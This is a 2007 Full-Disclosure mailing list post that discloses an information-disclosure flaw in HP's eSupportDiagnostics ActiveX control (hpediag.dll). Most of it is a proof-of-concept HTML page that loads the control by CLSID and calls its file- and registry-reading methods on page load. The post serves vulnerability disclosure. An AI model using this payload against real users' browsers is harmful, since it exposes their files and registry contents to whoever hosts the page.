Related information

HP eSupportDiagnostics ActiveX unauthorized access

HPSBGN02333 SSRT080031 rev.1 - HP Software Update HPeDiag Running on Windows, Remote Disclosure of Information and Execution of Arbitrary Code

From:	Elazar Broad <elazarb_(at)_earthlink.net>
Date:	20.12.2007
Subject:	[Full-disclosure] HP eSupportDiagnostics hpediags.dll Information Disclosure

The HP eSupportDiagnostics hpediag.dll exposes some methods that allow the reading of arbitrary files and registry values.

hpediag.dll, version 1.0.11.0

PoC as follows:

---------------------

<html>
<head>
 <script language="JavaScript" DEFER>
  function Check() {
   var out = fileUtil.ReadTextFile(somePath);
   var out = regUtil.ReadValue(somePath);

  }
 </script>

</head>
<body onload="JavaScript: return Check();">
 <object id="fileUtil" classid="clsid:CDAF9CEC-F3EC-4B22-ABA3-9726713560F8" />
 <object id="regUtil"  classid="clsid:0C378864-D5C4-4D9C-854C-432E3BEC9CCB" />
</body>
</html>

---------------------


Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/